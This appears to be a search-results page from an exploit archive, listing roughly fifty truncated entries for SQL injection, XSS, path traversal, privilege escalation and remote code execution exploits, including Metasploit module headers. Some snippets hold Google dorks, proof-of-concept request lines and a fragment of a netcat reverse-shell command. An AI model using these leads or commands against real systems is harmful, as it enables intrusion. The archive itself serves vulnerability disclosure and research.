50748 matches found
QuickDate 1.3.2 SQL Injection
Exploit Title: QuickDate 1.3.2 - SQL Injection Dork: N/A Date: 2020-02-07 Exploit Author: Ihsan Sencan Vendor Homepage: https://quickdatescript.com/ Version: 1.3.2 Tested on: Linux CVE: N/A POC: 1 POST /findmatches HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 X11; Linux x8664; rv:55.0...
MySQL / MariaDB / PerconaDB Privilege Escalation / Race Condition
============================================= - Release date: 01.11.2016 - Discovered by: Dawid Golunski - Severity: Critical - CVE-2016-6663 / OCVE-2016-5616 - http://legalhackers.com ============================================= I. VULNERABILITY ------------------------- MySQL / MariaDB /...
osCommerce 2.3.4.1 Cross Site Scripting
Exploit Title: osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting Date: 2020-11-19 Exploit Author: Emre Aslan Vendor Homepage: https://www.oscommerce.com/ Version: 2.3.4.1 Tested on: Windows & XAMPP == Tutorial https://HOST/catalog/admin/newsletters.php?action=new 3- Enter the XSS paylo...
GOG GalaxyClientService Privilege Escalation
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/post/windows/services' require 'openssl' class MetasploitModule 'GOG GalaxyClientService Privilege Escalation', 'Description' = %q This module will sen...
Apache HTTP Server 2.4.50 Path Traversal / Code Execution
Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution RCE Date: 10/05/2021 Exploit Author: Lucas Souza https://lsass.io Vendor Homepage: https://apache.org/ Version: 2.4.50 Tested on: 2.4.50 CVE : CVE-2021-42013 Credits: Ash Daulton and the cPanel Security Team !/bin/bash if...
Taskcafe 0.1.0 / 0.1.1 Cross Origin Resource Sharing
Exploit Title: Taskcafé 0.1.0 and 0.1.1- Cross-Origin Resource Sharing Date: 2020- 09- 02 Exploit Author: Mufaddal Masalawala Vendor Homepage: https://github.com/JordanKnott/ Software Link: https://github.com/JordanKnott/taskcafe Version: 0.1.0 and 0.1.1 Tested on: Kali Linux 2020.3 POC: The web...
SMB DOUBLEPULSAR Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'SMB DOUBLEPULSAR Remote Code Execution', 'Description' = %q This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR...
Wondershare Dr.Fone 3.0.0 Unquoted Service Path
Exploit Title: Wondershare Dr.Fone DriverInstall.exe - "WsDrvInst" Unquoted Service Path Date: 2020-10-29 Exploit Author: Andrea Intilangelo Vendor Homepage: https://www.wondershare.com Software Link: https://drfone.wondershare.com/ Version: 3.0.0 Tested on: Microsoft Windows 7sp2 x86/x64 CVE :...
School Faculty Scheduling System 1.0 SQL Injection
Exploit Title: School Faculty Scheduling System 1.0 - Authentication Bypass Date: 21/10/2020 Exploit Author: Jyotsna Adhana Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html Software Link:...
School Faculty Scheduling System 1.0 Cross Site Scripting
Exploit Title: School Faculty Scheduling System 1.0 - Stored Cross Site Scripting Date: 21/10/2020 Exploit Author: Jyotsna Adhana Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html Software Link:...
D-Link DSR-250N Denial Of Service
Advisory: Denial of Service in D-Link DSR-250N RedTeam Pentesting discovered a Denial-of-Service vulnerability in the D-Link DSR-250N device which allows unauthenticated attackers in the same local network to execute a CGI script which reboots the device. Details ======= Product: D-Link DSR-250N...
Microsoft Windows UAC Privilege Escalation
Hi @ll, Microsoft still ships Windows with and lets it create user-writable directories below the "Windows" directory %SystemRoot%\ -- despite that, with exception of %SystemRoot%\Temp, they are all used to store DATA and SHOULD have been placed below %ProgramData% alias %SystemDrive%\ProgramData...
Squid 4.14 / 5.0.5 Code Execution / Double Free
A Double-Free bug was found in Squid versions 4.14 and 5.0.5 when processing the "acl" directive on configuration files, more specifically the first and second addresses. This may allow arbitrary code execution on a Squid deployment on where the configuration files may be processed from untrusted...
DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'metasploit/framework/compiler/windows' class MetasploitModule 'DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation', 'Description' = %q This module...
WordPress Adning Advertising 1.5.5 Shell Upload
Exploit Title: WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload Google Dork: inurl:/wp-content/plugins/angwp Date: 23/12/2020 Exploit Author: spacehen Vendor Homepage: http://adning.com/ Version: spacehen www.lunar.sh" def printusage: print"Usage: python3 exploit.py target url ph...
MagnusBilling Remote Command Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/stopwatch' class MetasploitModule 'MagnusBilling application unauthenticated Remote Command Execution.', 'Description' = %q A Command Injection vulnerabilit...
Symmetricom SyncServer Unauthenticated Remote Command Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Symmetricom SyncServer Unauthenticated Remote Command Execution', 'Description' = %q This module exploits an unauthenticated command injection...
ElasticSearch 7.13.3 Memory Disclosure
Exploit Title: ElasticSearch 7.13.3 - Memory disclosure Date: 21/07/2021 Exploit Author: r0ny Vendor Homepage: https://www.elastic.co/ Software Link: https://github.com/elastic/elasticsearch Version: 7.10.0 to 7.13.3 Tested on: Kali Linux CVE : CVE-2021-22145 /usr/bin/python3 from argparse import...
ERPNext 12.18.0 / 13.0.0 SQL Injection
Trovent Security Advisory 2103-01 Authenticated SQL injection in ERPNext 13.0.0/12.18.0 Overview Advisory ID: TRSA-2103-01 Advisory version: 1.0 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2103-01 Affected product: ERPNext Tested versions: 12.18.0 and 13.0.0 beta...
Win32k ConsoleControl Offset Confusion
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Win32k ConsoleControl Offset Confusion', 'Description' = %q A vulnerability exists within win32k that can be leveraged by an attacker to escalate...
Simple Grocery Store Sales And Inventory System 1.0 SQL Injection
Exploit Title: Simple Grocery Store Sales And Inventory System 1.0 - Authentication Bypass Date: 24/09/2020 Exploit Author: Saurav Shukla & Jyotsna Adhana Vendor Homepage: https://www.sourcecodester.com/php/14461/simple-grocery-store-sales-and-inventory-system-using-phpmysql-source-code.html...
China Electronic WebSolutions Cnzz.Com 1.0 SQL Injection
Exploit Title : China Electronic WebSolutions Cnzz.Com 1.0 SQL Injection Author Discovered By : KingSkrupellos Date : 30/12/2018 Vendor Homepage : Cnzz.Com Google Dork : inurl:''/productlist.php?cate='' Tested On : Windows and Linux Category : WebApps Exploit Risk : Medium Version Information : 1...
Sysax MultiServer 6.90 Cross Site Scripting
Exploit Title: Sysax MultiServer 6.90 - Reflected Cross Site Scripting Google Dork: n.d. Date: 2020-06-02 Exploit Author: Luca Epifanio wrongsid3 Vendor Homepage: https://www.sysax.com/ Software Link: https://www.sysax.com/download.htm Version: MultiServer 6.90 Tested on: Windows 10 x64 CVE :...
Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'Apache Struts 2...
Grafana 8.3.0 Directory Traversal / Arbitrary File Read
Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read Date: 08/12/2021 Exploit Author: s1gh Vendor Homepage: https://grafana.com/ Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p Version: V8.0.0-beta1 through V8.3.0 Description...
Barco wePresent Admin Credential Exposure
KL-001-2020-005 : Barco wePresent Admin Credentials Exposed In Plain-text Title: Barco wePresent Admin Credentials Exposed In Plain-text Advisory ID: KL-001-2020-005 Publication Date: 2020.11.20 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-005.txt 1. Vulnerability Detai...
Trojan.Win32.Jorik.qje Insecure Permissions
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/982479ad10ff048d566516254051e17e.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan.Win32.Jorik.qje Vulnerability: Insecure Permissions Description: Jorik.qje creates an insecur...
xuucms 3 SQL Injection
Exploit Title: xuucms 3 - 'keywords' SQL Injection Date: 2020-11-18 Exploit Author: icekam Vendor Homepage: https://www.cxuu.top/ Software Link: https://github.com/cbkhwx/cxuucmsv3 Version: cxuucms - v3 CVE : CVE-2020-28091 SQL injection exists in search.php. For details, please refer to:...
Microsoft Windows Explorer Preview Pane Security Bypass
Exploit Title: Windows Explorer Preview Pane WMV/WMA media Automatic URI Opening Vulnerability Google Dork: n/a Date: December 25th, 2021 Exploit Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: http://www.microsoft.com/ Version: Windows 7, 8.1, 10, 11 x86/x64...
Sokrates SOWA SowaSQL Cross Site Scripting
Title: SOWA.OPAC Reflected Cross Site Scripting Vulnerability Type: Cross Site Scripting XSS Attack Type: Account Hijacking, Credential Theft, Data Leakage Author: Marek Holka Date: 2020-11-08 Vendor: SOKRATES-software Software Link: https://www.demo.sowwwa.pl/sowacgi.php Version: SOWA.OPAC all...
SQL Server Password Changer 1.90 Denial Of Service
Exploit Title: SQL Server Password Changer v1.90 Denial of Service Exploit Date: 29.08.2019 Vendor Homepage:https://www.top-password.com/ Exploit Author: Velayutham Selvaraj & Praveen Thiyagarayam TwinTech Solutions Tested Version: v2.10 Tested on: Windows 8 x64 Windows 7 x64 1.- Run python code...
WordPress GiveWP Donation / Fundraising Platform 3.14.1 Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'GiveWP Unauthenticated Donation Process Exploit', 'Description' = %q The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress in...
GOautodial 4.0 Shell Upload
Exploit Title: GOautodial 4.0 - Authenticated Shell Upload Author: Balzabu Discovery Date: 07-23-2020 Vendor Homepage: https://goautodial.org/ Software Link: https://goautodial.org/GOautodial-4-x8664-Final-20191010-0150.iso.html Tested Version: 4.0 Last relase as of today Tested on OS: CentOS 7...
Internet Download Manager 6.38.12 Buffer Overflow
Exploit Title: Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow PoC Date: November 18, 2020 Exploit Author: Vincent Wolterman Vendor Homepage: http://www.internetdownloadmanager.com/ Software Link: http://www.internetdownloadmanager.com/download.html Version:...
Visitor Management System In PHP 1.0 SQL Injection
Title: Visitor Management System in PHP 1.0 - Authenticated SQL Injection Exploit Author: Rahul Ramkumar Date: 2020-09-16 Vendor Homepage: https://projectworlds.in Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip Version: 1.0 Tested On: Windo...
SugarCRM 6.5.18 Cross Site Scripting
Document Title: =============== SugarCRM v6.5.18 - Employees Persistent Cross Site Vulnerability References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=2257 Release Date: ============= 2020-11-13 Vulnerability Laboratory ID VL-ID:...
Apache 2.4.x mod_proxy Denial Of Service
::: ::::::::: ::: :::::::: ::: ::::::::::::: ::: :::::::::::::::::::::::::::::::::: ::::::::: :+: :+: :+: :+: :+: :+: :+: :+::+: :+::+: :+: :+: :+: :+: :+: :+::+: :+: +:+ +:+ +:+ +:++:+ +:+ +:+ +:+ +:++:+ +:+ +:+ +:+ +:+ +:+ +:++:+ +:+ +++:++++:+++:++++++:++++:++ +++:+++++++:++ +++:++++ ++ ++...
Siemens A8000 CP-8050/CP-8031 SICAM WEB Missing File Download / Missing Authentication
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Missing Authentication at File Download & Denial of Service product: Siemens A8000 CP-8050/CP-8031 SICAM WEB vulnerable version: SICAM WEB Version 05.80 / Firmware Packag...
Development Kamel KCFinder 1.7 Shell Upload
Exploit Title : Development Kamel - KCFinder Shell Upload Vulnerability + Date : 25/03/2021 + Exploit Author : RAYAN ALi + Home : http://kamel.tech/ + Discovered By : RAYAN + Vendor Homepage : http://kamel.tech/ + Exploit: + http://localhost/resources/admin/Editor/kcfinder/browse.php?type=files +...
Mikrotik RouterOS Telnet Arbitrary Root File Creation
Mikrotik RouterOS telnet arbitrary root file creation 0day ========================================================== This weakness occurs "post-authentication" and can be used to escape the restricted shell on Mikrotik devices and escalate "readonly" privileges. Mikrotik contains a hidden "devel...
Creative Commons Attribution 3.0 SQL Injection
==================================================================================================================================== | Title : Creative Commons Attribution v3.0 Sql Injection Vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro | | Vendor :...
Aerospike Database 5.1.0.3 Remote Command Execution
Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution Date: 2020-08-01 Exploit Author: Matt S Vendor Homepage: https://www.aerospike.com/ Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect...
SyncBreeze 10.0.28 Remote Buffer Overflow
Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow Date: 18-Sep-2020 Exploit Author: Abdessalam kingA.salam Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.0.28.exe Version: 10.0.28 Tested on: Windows 7,windows...
Rapid7 Nexpose Installer 6.6.39 Unquoted Service Path
Exploit Title: Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path Date: 2020-08-31 Exploit Author: Angelo D'Amato Vendor Homepage: https://www.rapid7.com Version: sc qc nexposeengine SC QueryServiceConfig SUCCESS SERVICENAME: nexposeengine TYPE : 10 WIN32OWNPROCESS STARTTYPE ...
e107mygal-download.txt
e107 MyGallery Plugin Arbitrary File Download Vulnerability Release Date: 2008-03-25 Critical: Moderately critical Impact: Exposure of system information, Exposure of sensitive information Where: From remote Solution Status: Unpatched Software: MyGallery v2.3 plugin for e107 Link:...
F5 iControl Server-Side Request Forgery / Remote Command Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'F5 iControl REST Unauthenticated SSRF Token Generation RCE', 'Description' = %q This module exploits a pre-auth SSRF in the F5 iControl REST API'...
Microsoft Internet Explorer 11 Use-After-Free
Exploit Title: Microsoft Internet Explorer 11 32-bit - Use-After-Free Date: 2021-02-05 Exploit Author: deadlock Forrest Orr Vendor Homepage: https://www.microsoft.com/ Software Link: https://www.microsoft.com/en-gb/download/internet-explorer.aspx Version: IE 8, 9, 10, and 11 Tested on: Windows 7...
Car Rental Management System 1.0 Shell Upload
Exploit Title: Car Rental Management System 1.0 - Remote Code Execution Authenticated Date: 2020-11.13 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html...
Hrsale 2.0.0 Local File Inclusion
Exploit Title: Hrsale 2.0.0 - Local File Inclusion Date: 10/21/2020 Exploit Author: Sosecure Vendor Homepage: https://hrsale.com/index.php Version: version 2.0.0 Description: This exploit allow you to download any readable file from server with out permission and login session. Payload :...
Hostel Management System 2.1 Cross Site Scripting
Exploit Title: PHPGurukul hostel-management-system 2.1 allows XSS via Guardian Name, Guardian Relation, Guardian Contact no, Address, City Google Dork: N/A Date: 2020-10-08 Exploit Author: Kokn3t Vendor Homepage: https://phpgurukul.com Software Link: https://phpgurukul.com/hostel-management-syste...